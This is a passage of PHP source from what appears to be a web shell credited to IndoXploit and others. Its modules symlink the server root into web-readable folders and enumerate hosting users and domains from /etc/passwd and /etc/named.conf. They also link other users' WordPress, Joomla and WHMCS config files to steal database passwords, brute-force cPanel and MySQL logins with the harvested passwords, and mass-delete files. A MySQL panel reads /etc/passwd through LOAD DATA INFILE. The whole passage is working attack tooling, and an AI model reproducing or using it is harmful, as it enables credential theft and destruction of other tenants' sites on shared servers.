1676if ($symlink) {@symlink("$target","sym/$symfile");
1677echo '<br><center><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a><br><br><br><br></center>';}}
1678/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1679//sym sec
1680elseif(isset($_GET['x']) && ($_GET['x'] == 'sec')){
1681$d0mains = @file("/etc/named.conf");
1682##httaces
1683if($d0mains){
1684@mkdir("k2",0777);
1685@chdir("k2");
1686@exe("ln -s / root");
1687$file3 = 'Options all
1688DirectoryIndex Sux.html
1689AddType text/plain .php
1690AddHandler server-parsed .php
1691AddType text/plain .html
1692AddHandler txt .html
1693Require None
1694Satisfy Any';
1695$fp3 = fopen('.htaccess','w');
1696$fw3 = fwrite($fp3,$file3);@fclose($fp3);
1697echo "<br><br><center><h2>Symlink Server !</h2></center>
1698<table class='explore' align=center style='width:60%;border-bottom: 3px solid #333333;'>
1699<tr>
1700<td align=center><font size=3>S. No.</font></td>
1701<td align=center><font size=3>Domains</font></td>
1702<td align=center><font size=3>Users</font></td>
1703<td align=center><font size=3>Symlink</font></td>
1704</tr>";
1705$dcount = 1;
1706foreach($d0mains as $d0main){
1707if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
1708flush();
1709if(strlen(trim($domains[1][0])) > 2){
1710$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1711echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
1712<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
1713<td>".$user['name']."</td>
1714<td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
1715flush();
1716$dcount++;}}}
1717echo "</table>";
1718}else{
1719$TEST=@file('/etc/passwd');
1720if ($TEST){
1721@mkdir("k2",0777);
1722@chdir("k2");
1723exe("ln -s / root");
1724$file3 = 'Options all
1725 DirectoryIndex Sux.html
1726 AddType text/plain .php
1727 AddHandler server-parsed .php
1728 AddType text/plain .html
1729 AddHandler txt .html
1730 Require None
1731 Satisfy Any';
1732 $fp3 = fopen('.htaccess','w');
1733 $fw3 = fwrite($fp3,$file3);
1734 @fclose($fp3);
1735 echo "<br><br><center><h2>Symlink Server !</h2></center>
1736 <table class='explore' align=center style='width:60%;border-bottom: 3px solid #333333;'><tr>
1737 <td align=center><font size=4>S. No.</font></td>
1738 <td align=center><font size=4>Users</font></td>
1739 <td align=center><font size=4>Symlink</font></td></tr>";
1740 $dcount = 1;
1741 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
1742 while(!feof($file)){
1743 $s = fgets($file);
1744 $matches = array();
1745 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1746 $matches = str_replace("home/","",$matches[1]);
1747 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1748 continue;
1749 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
1750 <td align=center><font class=txt>" . $matches . "</td>";
1751 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1752 $dcount++;}fclose($file);
1753 echo "</table>";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
1754 DirectoryIndex Sux.html
1755 AddType text/plain .php
1756 AddHandler server-parsed .php
1757 AddType text/plain .html
1758 AddHandler txt .html
1759 Require None
1760 Satisfy Any';
1761 $fp3 = fopen('.htaccess','w');
1762 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1763 echo "<br><br><center><h2>Symlink Server !</h2></center><center>
1764 <div class='mybox'>
1765 <table class='explore' align=center style='width:60%;border-bottom: 3px solid #333333;'><tr>
1766 <td align=center><font size=4>id</font></td>
1767 <td align=center><font size=4>Users</font></td>
1768 <td align=center><font size=4>Symlink</font></td></tr>";
1769 $temp = "";$val1 = 0;$val2 = 1000;
1770 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
1771 if ($uid)$temp .= join(':',$uid)."\n";}
1772 echo '<br/>';$temp = trim($temp);$file5 =
1773 fopen("test.txt","w");
1774 fputs($file5,$temp);
1775 fclose($file5);$dcount = 1;$file =
1776 fopen("test.txt", "r") or exit("Unable to open file!");
1777 while(!feof($file)){$s = fgets($file);$matches = array();
1778 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
1779 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1780 continue;
1781 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
1782 <td align=center><font class=txt>" . $matches . "</td>";
1783 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1784 $dcount++;}
1785 fclose($file);
1786 echo "</table></div></center>";unlink("test.txt");
1787 } else
1788 echo "<center><font size=4>Cannot create Symlink</font></center>";
1789 }
1790 }
1791 }
1792/////////////////////////////////
1793 /* HAPUS MASSAL */
1794/////////////////////////////////
1795elseif($_GET['move'] == 'on') {
1796 echo "<br>";
1797 $dir = getcwd();
1798 $namafile = $_GET['d_file'];
1799 function hapus_massal($dir,$namafile) {
1800 if(is_writable($dir)) {
1801 $dira = scandir($dir);
1802 foreach($dira as $dirb) {
1803 $dirc = "$dir/$dirb";
1804 $lokasi = $dirc.'/'.$namafile;
1805 if($dirb === '.') {
1806 if(file_exists("$dir/$namafile")) {
1807 unlink("$dir/$namafile");
1808 echo "Succes deleted file => ";
1809 }
1810 } elseif($dirb === '..') {
1811 if(file_exists("".dirname($dir)."/$namafile")) {
1812 unlink("".dirname($dir)."/$namafile");
1813 echo "lololl";
1814 }
1815 } else {
1816 if(is_dir($dirc)) {
1817 if(is_writable($dirc)) {
1818 echo "$namafile"; if(file_exists($lokasi)) {
1819 echo "<center>[<font color=lime>DELETED</font>] $lokasi</center><br>";
1820 unlink($lokasi);
1821 $idx = hapus_massal($dirc,$namafile);
1822 }
1823 }
1824 }
1825 }
1826 }
1827 }
1828 }
1829 if($_POST['start']) {
1830 echo "<div style='margin: 5px auto; padding: 5px'>";
1831 hapus_massal($_POST['d_dir'], $_POST['d_file']);
1832 echo "</div>";
1833 } else {
1834 echo "<center>";
1835 echo "<form method='post'>
1836 <font style='text-decoration: underline;'>Folder:</font><br>
1837 <input type='text' name='d_dir' value='$dir' class='inputz'><br>
1838 <font style='text-decoration: underline;'>Filename:</font><br>
1839 <input type='text' name='d_file' value='index.php' class='inputz'><br><br>
1840 <input type='submit' name='start' value='Mass Delete' class='inputzbut'>
1841 </form></center>";
1842 }
1843}
1844/////////////////////////////////
1845 /* CPANEL BACOK */
1846/////////////////////////////////
1847elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel2'))
1848 {
1849 echo "<br>";
1850
1851 if($_POST['crack']) {
1852 $usercp = explode("\r\n", $_POST['user_cp']);
1853 $passcp = explode("\r\n", $_POST['pass_cp']);
1854 $i = 0;
1855 foreach($usercp as $ucp) {
1856 foreach($passcp as $pcp) {
1857 if(@mysql_connect('localhost', $ucp, $pcp)) {
1858 if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1859 } else {
1860 $_SESSION[$ucp] = "1";
1861 $_SESSION[$pcp] = "1";
1862 $i++;
1863 echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1864 }
1865 }
1866 }
1867 }
1868 if($i == 0) {
1869 } else {
1870 echo "<br>Cpanel found : ".$i." by <font color=lime>IndoXploit.</font>";
1871 }
1872 } else {
1873 echo "<center>
1874 <form method='post'>
1875 USER: <br>
1876 <textarea style='width: 450px; height: 150px;background:black' name='user_cp'>";
1877 $_usercp = fopen("/etc/passwd","r");
1878 while($getu = fgets($_usercp)) {
1879 if($getu == ' || !$_usercp) {
1880 echo "<font color=red>Can't read /etc/passwd</font>";
1881 } else {
1882 preg_match_all("/(.*?):x:/", $getu, $u);
1883 foreach($u[1] as $user_cp) {
1884 if(is_dir("/home/$user_cp/public_html")) {
1885 echo "$user_cp\n";
1886 }
1887 }
1888 }
1889 }
1890 echo "</textarea><br>
1891 PASS: <br>
1892 <textarea style='width: 450px; height: 200px;background:black;' name='pass_cp'>";
1893 function cp_pass($dir) {
1894 $pass = "";
1895 $dira = scandir($dir);
1896 foreach($dira as $dirb) {
1897 if(!is_file("$dir/$dirb")) continue;
1898 $ambil = file_get_contents("$dir/$dirb");
1899 if(preg_match("/WordPress/", $ambil)) {
1900 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1901 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1902 $pass .= ambilkata($ambil,"password = '","'")."\n";
1903 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1904 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1905 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1906 $pass .= ambilkata($ambil,'password = "','"')."\n";
1907 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1908 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1909 } elseif(preg_match("/client/", $ambil)) {
1910 preg_match("/password=(.*)/", $ambil, $pass1);
1911 if(preg_match('/"/', $pass1[1])) {
1912 $pass1[1] = str_replace('"', "", $pass1[1]);
1913 $pass .= $pass1[1]."\n";
1914 }
1915 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1916 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1917 }
1918 }
1919 echo $pass;
1920 }
1921 $cp_pass = cp_pass($dir);
1922 echo $cp_pass;
1923 echo "</textarea><br><br>
1924 <input type='submit' name='crack' class='inputzbut' value='Crack'>
1925 </form>
1926 NB: CPanel Crack ini sudah auto get password ( pake db password )</center>";
1927 }
1928
1929
1930 ?>
1931
1932 <?php
1933
1934}
1935
1936 /* by S1r_V1ru5 and sinkaroid kerupuk */
1937
1938 elseif(isset($_GET['x']) && ($_GET['x'] == 'dv')){ @ini_set('output_buffering',0);
1939{
1940 ?>
1941 <form action="?y=<?php echo $pwd; ?>&x=dv" method="post">
1942 <center><h2>Domain Viewer <br>Notes: if blank(no domain) that mean not work use domain viewer, you can use symlink server</center>
1943 <?php
1944 function openBaseDir()
1945{
1946$openBaseDir = ini_get("open_basedir");
1947if (!$openBaseDir)
1948 {
1949 $openBaseDir = '<font color="green">OFF</font>';
1950 }
1951 else
1952 {
1953 $openBaseDir = '<font color="red">ON</font>';
1954 }
1955 return $openBaseDir;
1956}
1957
1958
1959echo '
1960 <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
1961 <td height="100" align="left" class="td1">';
1962 $pg = basename(__FILE__);
1963 $safe_mode = @ini_get('safe_mode');
1964 $dir = @getcwd();
1965 ////////////////////////////////////////////////////
1966 // LET'S PLAY ~
1967 ##.htaccess
1968@mkdir('pee',0777);
1969@symlink("/","pee/root");
1970$htaccss = "Options all
1971 DirectoryIndex Sux.html
1972 AddType text/plain .php
1973 AddHandler server-parsed .php
1974 AddType text/plain .html
1975 AddHandler txt .html
1976 Require None
1977 Satisfy Any";
1978
1979file_put_contents("pee/.htaccess",$htaccss);
1980$etc = file_get_contents("/etc/passwd");
1981$etcz = explode("\n",$etc);
1982
1983
1984##Symlink to the ROOT :p
1985foreach($etcz as $etz){
1986$etcc = explode(":",$etz);
1987error_reporting(0);
1988
1989$current_dir = posix_getcwd();
1990$dir = explode("/",$current_dir);
1991
1992symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1993symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1994symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1995symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1996symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
1997symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
1998symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1999symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2000symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2001symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
2002symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
2003symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
2004symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
2005symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
2006symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
2007symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
2008symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
2009symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2010symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2011symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2012symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2013symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2014symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2015symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2016symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2017symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2018symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2019symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2020symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2021symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
2022}
2023#############################
2024 if(is_readable("/var/named")){
2025 echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2026 echo'<tr><td><center><b>SITE</b></center></td><td>
2027 <center><b>USER</b></center></td>
2028 <td></center><b>SYMLINK</b></center></td>';
2029 $list = scandir("/var/named");
2030 foreach($list as $domain){
2031 if(strpos($domain,".db")){
2032 $i += 1;
2033 $domain = str_replace('.db',',$domain);
2034 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2035
2036 echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
2037 <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
2038 <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2039 }
2040 }
2041 echo "<center>Total Domains Found: ".$i."</center><br />";
2042 }else{
2043 echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
2044
2045break;
2046
2047##################################
2048error_reporting(0);
2049$etc = file_get_contents("/etc/passwd");
2050$etcz = explode("\n",$etc);
2051if(is_readable("/etc/passwd")){
2052
2053echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2054echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
2055
2056$list = scandir("/var/named");
2057
2058foreach($etcz as $etz){
2059$etcc = explode(":",$etz);
2060
2061foreach($list as $domain){
2062if(strpos($domain,".db")){
2063$domain = str_replace('.db',',$domain);
2064$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2065if($owner['name'] == $etcc[0])
2066{
2067$i += 1;
2068echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
2069<td class='td1'><font color='red'>".$owner['name']."</font></center></td>
2070<td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2071}}}}
2072echo "<center>Total Domains Found: ".$i."</center><br />";}
2073
2074break;
2075###############################
2076if(is_readable("/etc/named.conf")){
2077echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2078echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
2079$named = file_get_contents("/etc/named.conf");
2080preg_match_all('%zone \"(.*)\" {%',$named,$domains);
2081foreach($domains[1] as $domain){
2082$domain = trim($domain);
2083$i += 1;
2084$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2085echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2086}
2087echo "<center>Total Domains Found: ".$i."</center><br />";
2088
2089} else { echo "<tr><td class='td1'><center>can't read [ /etc/named.conf ]</center></td></tr>"; }
2090
2091break;
2092############################
2093if(is_readable("/etc/valiases")){
2094echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2095echo'<tr><td><center><b>SITE</b></center></td><td>
2096<center><b>USER</b></center></td><td></center>
2097<b>SYMLINK</b></center></td>';
2098$list = scandir("/etc/valiases");
2099foreach($list as $domain){
2100$i += 1;
2101$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2102echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
2103<center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
2104<td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2105}
2106echo "<center>Total Domains Found: ".$i."</center><br />";
2107} else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
2108
2109break;
2110}}
2111
2112/* Mysql */
2113
2114elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
2115
2116 if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
2117{
2118$sqlhost = $_GET['sqlhost'];
2119$sqluser = $_GET['sqluser'];
2120$sqlpass = $_GET['sqlpass'];
2121$sqlport = $_GET['sqlport'];
2122if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
2123{
2124$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";
2125$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= " <span class='gaya'>-></span> <a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&'>[ databases ]</a>";
2126if(isset($_GET['db'])) $msg .= " <span class='gaya'>-></span> <a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";
2127if(isset($_GET['table'])) $msg .= " <span class='gaya'>-></span> <a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";
2128
2129
2130$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
2131 $db = $_GET['db'];
2132$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
2133$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";
2134$tables = array();
2135$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
2136while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
2137foreach($tables as $table){
2138$msg .= "<tr><td><a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."'>$table</a> </td></tr>";} $msg .= "</table>";}
2139elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
2140$db = $_GET['db'];
2141$table = $_GET['table'];
2142$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
2143$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";
2144$columns = array();
2145$msg = "<table class='explore' style='width:99%;'>";
2146$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
2147while(list($column) = @mysql_fetch_row($hasil)){
2148
2149 $msg .= "<th>$column </th>";
2150 $kolum = $column;
2151
2152}
2153
2154$msg .= "</tr>";
2155$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
2156list($total) = mysql_fetch_row($hasil);
2157if(isset($_GET['z'])) $page = (int) $_GET['z'];
2158else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
2159
2160
2161while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";
2162$zos = $hasil;
2163foreach($datas as $data){
2164
2165 if(trim($data) == "")
2166$data = " ";
2167
2168
2169/* edit query */
2170
2171$hazil = "UPDATE ".$table." SET ".$kolum."=%27YOUR DATA%27%3B";
2172
2173/* close */
2174
2175
2176$msg .= "<td>$data</td>";}
2177
2178$msg .= "</tr>";}
2179$msg .= "</table>";
2180$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
2181for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
2182if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
2183elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];
2184$query = magicboom($_GET['sqlquery']);
2185
2186
2187/* form input */
2188
2189$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";
2190
2191
2192@mysql_select_db($db);
2193$querys = explode(";",$query);
2194foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
2195if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
2196for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
2197if($rows[$j] == "") $dataz = " ";
2198else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
2199else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query."; <span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
2200else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
2201while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
2202$msg .= "<tr><td><a href='?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
2203@mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
2204<br><center><div class="mybox"><h2 class="k2ll33d2">MySQL Connect !</h2>
2205<form action="?" method="get"><input type="hidden" name="y" value="<?php echo $pwd;?>" />
2206<input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;"> <tr>
2207<th colspan="2">Connection Form</th></tr> <tr><td> Host</td><td>
2208<input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
2209<tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
2210<tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
2211<tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" />
